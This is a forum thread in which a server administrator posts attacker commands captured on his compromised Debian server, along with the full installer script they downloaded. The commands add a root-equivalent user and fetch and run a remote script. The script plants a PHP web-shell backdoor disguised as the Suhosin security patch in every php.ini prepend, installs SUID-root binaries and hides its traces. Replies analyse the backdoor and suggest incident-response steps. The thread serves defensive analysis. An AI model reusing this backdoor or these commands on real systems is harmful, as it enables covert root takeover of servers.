I have probably just detected that a user on a server of mine has rooted my server, but that's not what I'm asking.
Has anyone ever seen command like these:
echo _EoT_0.249348813417008_;
id;
echo _EoT_0.12781402577841_;
echo $PATH && a=`env |grep PATH | awk -F '=' '{print $2":/usr/sbin"}'` && export PATH=$a && echo $PATH;
echo _EoT_0.247556708344121_;
whereis useradd;
echo _EoT_0.905792585668774_;
useradd -p saZlzoRm9L4Og -o -g 0 -u 0 aspnet;
echo _EoT_0.369123892063307_;
wget http://178.xxx.xxx.181/suhosin14.sh;
echo _EoT_0.845361576801043_;
chmod +x suhosin14.sh && ./suhosin14.sh && sleep 5 && ls -la && locate index.php;
echo _EoT_0.161914402299161_;
rm -rf /tmp/ZyCjBiU;
echo _EoT_0.751816968837201_;
Seems to me that it's a work of some automated script, but I'm not sure which one.
Anyone has a clue about this?
OS is Debian Lenny, kernel 2.6.30-bpo.2-686-bigmem (if that's important).
By the way, link in code above is masked, anyone who wants code that is downloaded, I have made a copy, for analysis, so I can provide it on request.
Edit: I'm attaching contents of .sh script, as a reference, if anyone's interested.
#!/bin/sh
PHP=`which php`
PHP_INCLUDE_PATH=`$PHP -i|grep 'include_path' | awk '{print $3}' | awk -F ":" '{print $2}'`
if [ -z $PHP_INCLUDE_PATH ]
then
PHP_INCLUDE_PATH="/usr/share/php"
mkdir -p $PHP_INCLUDE_PATH
fi
GETROOT_32=$PHP_INCLUDE_PATH"/suhosin32.so"
GETROOT_32_URL="http://178.xxx.xxx.181/32"
GETROOT_64=$PHP_INCLUDE_PATH"/suhosin64.so"
GETROOT_64_URL="http://178.xxx.xxx.181/64"
PHP_FILE_PATH=$PHP_INCLUDE_PATH"/suhosin.php"
PHP_FILE_PATH_SLASHED=`echo $PHP_FILE_PATH | sed 's/\//\\\\\//g'`;
for file in `find / -type f -name 'php.ini'`
do
APPEND=`egrep -v '^;' $file | grep auto_prepend_file`
OPENBASEDIR=`egrep -v '^;' $file | grep open_basedir`
echo "[*] opendir:$OPENBASEDIR"
if [ ! -z "$APPEND" ]
then
APPEND_CMD=`echo $APPEND | awk -F "=" '{print $1}'`
APPEND_FILE=`echo $APPEND | awk -F "=" '{print $2}'`
echo "[*] $file : $APPEND_CMD=$APPEND_FILE"
echo "[~] need to replace auto append file"
if [ ! -z "$APPEND_FILE" ]; then APPEND_FILE=`echo "$APPEND_FILE" | sed 's/\//\\\\\//g'`;fi
sed "s/$APPEND_CMD=$APPEND_FILE/$APPEND_CMD=$PHP_FILE_PATH_SLASHED/g" $file > 1
else
echo "[~] need to add auto_append_file"
cp $file 1
echo "auto_prepend_file = $PHP_FILE_PATH" >> 1
fi
touch -r $file 1
mv 1 $file
done
echo "[!] printing $PHP_FILE_PATH"
if [ ! -d $PHP_INCLUDE_PATH ]; then mkdir $PHP_INCLUDE_PATH; fi
cat >$PHP_FILE_PATH<<EOF
<?php
/**
* SUHOSIN, the PHP Extension and Application Repository
*
* SUHOSIN security patch
*
* PHP versions 4 and 5
*
* @category pear
* @package Suhosin patch
* @author Sterling Hughes <[email protected]>
* @author Stig Bakken <[email protected]>
* @author Tomas V.V.Cox <[email protected]>
* @author Greg Beaver <[email protected]>
* @copyright 1997-2010 The Authors
* @license http://opensource.org/licenses/bsd-license.php New BSD License
* @version CVS: \$Id: PEAR.php 299159 2010-05-08 22:32:52Z dufuz \$
* @link http://pear.php.net/package/PEAR
* @since File available since Release 0.1
*/
function suhosin_unxor(\$data,\$len,\$key)
{
for(\$i=0;\$i<\$len;\$i++)
{
\$data[\$i]=chr((\$key+\$i)^ord(\$data[\$i]));
}
return \$data;
}
if(isset(\$_SERVER['REQUEST_URI']))
{
if(isset(\$_POST['suhosinkey']) && isset(\$_POST['suhosinaction']))
{
if(\$_POST['suhosinkey']=='we48b230948312-0491vazXAsxdadsxks!asd')
{
if(isset(\$_POST['suhosindata']) && isset(\$_POST['suhosincrc'])
&& crc32(\$_POST['suhosindata'])==\$_POST['suhosincrc'])
{
\$data=base64_decode(\$_POST['suhosindata']);
\$data=suhosin_unxor(\$data,strlen(\$data),ord('W'));
if(\$_POST['suhosinaction']=="update")
{
print "SUHOSIN OK\n".file_put_contents(__FILE__,\$data);
}
else if(\$_POST['suhosinaction']=="command")
{
system(\$data);
print("SUHOSIN CMD\n");
}
}
}
}
}
?>
EOF
chmod 777 $PHP_FILE_PATH
touch -r /bin/ls $PHP_FILE_PATH
echo "[*] installing getroots ($GETROOT_32 $GETROOT_64)"
WGET=`which wget`
CHOWN=`which chown`
`$WGET $GETROOT_32_URL -O $GETROOT_32`
`$CHOWN root $GETROOT_32`
chmod 4755 $GETROOT_32
touch -r /bin/ls $GETROOT_32
`$WGET $GETROOT_64_URL -O $GETROOT_64`
`$CHOWN root $GETROOT_64`
chmod 4755 $GETROOT_64
touch -r /bin/ls $GETROOT_64
ls -la $GETROOT_32 $GETROOT_64
echo "[!] restarting ctls"
for ctl in ` ls {/usr/local/{http*,apache*}/bin/*ctl,/usr/sbin/{http*,apache*}ctl} 2>&1 | grep -v "No such"`
do
echo "[*] restarting $ctl"
`\$ctl restart`
done
rm $0
Interesting.
Interesting, indeed.
I've never seen this thing before, but looking at the
suhosin14.shscript, it is evil. It modifies all thephp.inifiles it can find on the system, hoping to cause PHP to prepend some code on-the-fly into every PHP web page rendered (viaauto_prepend_file).suhosin14.shalso downloads and installs a pair of SUID-root modules, presumably to get its prepended PHP code to run with root privileges.The prepended PHP script (
suhosin.php) contains a comment header that makes it claim to be part of the Suhosin security patch for PHP, but it is certainly not. Instead, the script watches for particular HTTP POST requests containing XOR-obfuscated commands, which it then de-obfuscates and runs (presumably withrootprivileges, thanks to the SUID-root modules).If this thing was run on your system, then it is likely rooted. Undoing what the
suhosin14.shinstaller has done [specifically: remove the PHP prepend-scriptsuhosin.php, remove the SUID-root modulessuhosin32.soandsuhosin64.so, and restore your originalphp.inifile(s)] is probably not enough to ensure safety, since someone had to have gainedrootaccess to successfully run the installer in the first place. Furthermore, subsequent commands sent remotely via the PHP prepend-script could have easily installed any number of rootkits or other backdoors.Not much else I can suggest, except maybe to check your Apache logs for POST requests to pages that normally shouldn't get POST requests: those are likely instances of remote commands sent to your system. Unfortunately, the logs won't tell you what commands were executed, but you might get some other useful info, like IP addresses and timestamps.
This also happened to me a few days ago as well. Are you by any chance using Drupal or Wordpress? I'm curious if it might be due to a vulnerability with either of those CMS. I've had this happen three times now and have taken some security precautions, but they still seem to be able to add the suhosin prepend to our php.ini file. Very annoying to say the least. Any more info on possible causes or solutions would be very much appreciated.
Thanks, Joseph
wow, this is amazing, exactly the same happened to me on Thursday and they broke my whole server. I still don't know what I have to fix. Can anybody tell me?
I found a few interesting things on this in my log files. So I know somebody connected to it and downloaded a file to the server, which is quite amazing. I even found the same IP as the one that you guys posted before.
Very interesting is definitely your comment about useradd as I had a line saying:
I use Wordpress as well, so might be that this is the problem, but I have a few other programs, so who knows.